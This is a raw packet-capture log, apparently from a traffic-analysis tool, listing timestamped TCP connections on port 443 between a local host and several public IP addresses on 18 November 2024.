                                                                                                                                          Nov 18, 2024 06:47:33.358144999 CET44349710142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:33.358206034 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:33.527226925 CET49673443192.168.2.16204.79.197.203
                                                                                                                                          Nov 18, 2024 06:47:34.210835934 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:34.210881948 CET44349710142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:34.970205069 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:34.970237017 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:34.970329046 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:34.970551014 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:34.970571995 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.580279112 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.580574989 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.580604076 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.581703901 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.582146883 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.582302094 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.582308054 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.582324028 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.582390070 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.582429886 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.582526922 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.582577944 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.904572964 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.904664993 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.904692888 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.904741049 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.904762030 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.904808044 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.905009985 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.905096054 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.905144930 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.905401945 CET55143443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.905416012 CET44355143104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.908590078 CET55144443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.908659935 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:35.908760071 CET55144443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.908989906 CET55144443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:35.909022093 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.151527882 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:36.151591063 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.151691914 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:36.151973009 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:36.152002096 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.526187897 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.526525974 CET55144443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:36.526556015 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.527709007 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.528039932 CET55144443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:36.528115034 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.528281927 CET55144443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:36.550061941 CET4968080192.168.2.16192.229.211.108
                                                                                                                                          Nov 18, 2024 06:47:36.571347952 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.674428940 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.674595118 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.674664974 CET55144443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:36.678935051 CET55144443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:36.678973913 CET44355144104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.773389101 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.773657084 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:36.773679972 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.774674892 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.774751902 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:36.775553942 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:36.775626898 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.775805950 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:36.775821924 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:36.821115971 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:37.529633999 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:37.529735088 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:37.529798985 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:37.531136036 CET55145443192.168.2.16188.114.97.3
                                                                                                                                          Nov 18, 2024 06:47:37.531158924 CET44355145188.114.97.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:37.668451071 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:37.668499947 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:37.668608904 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:37.668801069 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:37.668818951 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:38.275533915 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:38.275943995 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:38.275979042 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:38.276978970 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:38.277075052 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:38.277332067 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:38.277400970 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:38.277452946 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:38.319334030 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:38.324163914 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:38.324198008 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:38.372121096 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:39.006612062 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:39.006726980 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:39.006822109 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:39.007981062 CET55148443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:39.008048058 CET44355148188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:40.968208075 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:40.968246937 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:40.968417883 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:40.968760014 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:40.968772888 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.693068981 CET49678443192.168.2.1620.189.173.10
                                                                                                                                          Nov 18, 2024 06:47:41.725341082 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.726473093 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.726492882 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.727987051 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.728072882 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.729171991 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.729247093 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.729371071 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.729378939 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.773060083 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.963519096 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.963545084 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.963553905 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.963602066 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.963625908 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.963633060 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.963650942 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.963671923 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.963699102 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.977447033 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.977468967 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.977531910 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:41.977539062 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:41.977582932 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.095288038 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.095340967 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.095386028 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.095401049 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.095434904 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.095449924 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.095460892 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.095468998 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.095515013 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.095520973 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.095596075 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.095643044 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.096174002 CET55151443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.096189022 CET4435515113.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.119649887 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:42.119679928 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.119765997 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:42.120047092 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:42.120065928 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.130434990 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.130462885 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.130528927 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.130990982 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.131006002 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.860258102 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.860541105 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:42.860572100 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.861742973 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.861816883 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:42.862150908 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:42.862236023 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.862335920 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:42.862345934 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.866023064 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.866256952 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.866267920 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.868663073 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.868725061 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.869508982 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.869576931 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.906080961 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:42.921066999 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:42.921076059 CET4435515613.107.246.60192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:42.969064951 CET55156443192.168.2.1613.107.246.60
                                                                                                                                          Nov 18, 2024 06:47:43.110380888 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.110410929 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.110418081 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.110439062 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.110455990 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.110477924 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.110501051 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.110527992 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.110553980 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.112407923 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.112428904 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.112479925 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.112488985 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.112504959 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.112543106 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.229458094 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.229480982 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.229554892 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.229578972 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.229628086 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.229908943 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.229959965 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.229967117 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.230017900 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.230056047 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.230118990 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.230144024 CET4435515213.107.246.45192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.230160952 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.230191946 CET55152443192.168.2.1613.107.246.45
                                                                                                                                          Nov 18, 2024 06:47:43.674346924 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.674401999 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.674463034 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.674827099 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.674849987 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.773716927 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.773808002 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.773900986 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.774137974 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.774163961 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.774213076 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.774794102 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.774828911 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:43.775337934 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:43.775348902 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.704641104 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.704915047 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.704933882 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.706583023 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.706666946 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.707572937 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.707669973 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.707740068 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.755332947 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.760066032 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.760103941 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.808058023 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.811136961 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.811466932 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.811484098 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.811887980 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.812110901 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.812149048 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.813591957 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.813674927 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.814085960 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.814174891 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.814264059 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.814279079 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.814790010 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.814850092 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.815188885 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.815274000 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.815291882 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.855072975 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.855082035 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.855124950 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.902076960 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:44.937235117 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:44.981095076 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.043456078 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.044071913 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.049022913 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.049037933 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.049069881 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.049084902 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.049108028 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.049124002 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.049180031 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.049209118 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.049235106 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.050908089 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.050918102 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.050947905 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.050975084 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.050981998 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.051002026 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.051024914 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.051044941 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.091207981 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.092334032 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.160495996 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.160509109 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.160550117 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.160569906 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.160589933 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.160600901 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.160609007 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.160639048 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.160671949 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.161691904 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.161710978 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.161731005 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.161740065 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.161770105 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.161884069 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.161884069 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.161885023 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.161950111 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.162010908 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.163285017 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.163294077 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.163338900 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.163350105 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.163369894 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.163377047 CET44355160152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.163397074 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.163403988 CET55160443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.164000988 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.164022923 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.164098024 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.164114952 CET44355159152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.164180040 CET55159443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.165694952 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.165719032 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.165796995 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.165848017 CET44355158152.199.21.175192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:45.165904045 CET55158443192.168.2.16152.199.21.175
                                                                                                                                          Nov 18, 2024 06:47:45.167330027 CET44355158152.199.21.175192.168.2.16
